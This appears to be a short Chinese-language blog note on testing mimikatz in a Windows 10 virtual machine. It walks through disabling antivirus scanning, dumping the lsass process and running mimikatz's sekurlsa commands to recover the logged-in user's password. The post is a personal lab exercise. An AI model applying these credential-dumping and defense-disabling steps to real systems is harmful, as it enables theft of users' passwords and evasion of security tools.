今天看到新聞中提及mimikatz ,想到看到這個工具很多次了,一直沒來試試看,因為防毒一直會刪除威脅檔案,所以下載了windows 10的VM檔案來測試,結果也是會刪檔案,為了測試看看,只好暫時停用virus scan了,蠻難找的,要記一下
1.環境準備,下載檔案連結如VM檔案, 安裝方式可以參考這篇
2.關閉virus scan
3.下載mimikatz並執行
教學有很多,這裡我選正在登入者的密碼,簡化流程且成功的,其他的用法,請期待下一版
1.vm啟動後要改一下密碼,否則測試沒密碼的也不知道解不解得出來
2.Windows 10 關閉 Virus Scan
或是在新版的windows 10的放大鏡輸入virus,就會跳出來選單
3.測試方式
log
privilege::debug
3.1 產生dump file(若是用管理者開啟cmd,就變成非必要)
taskmgr 找lass create dump file
3.2 找到下載好的mimikatz執行檔,x64目錄下 double click
sekurlsa::minidump “c:\Users\User\AppData\Local\Temp\lsass.DMP”
sekurlsa::logonPasswords
留言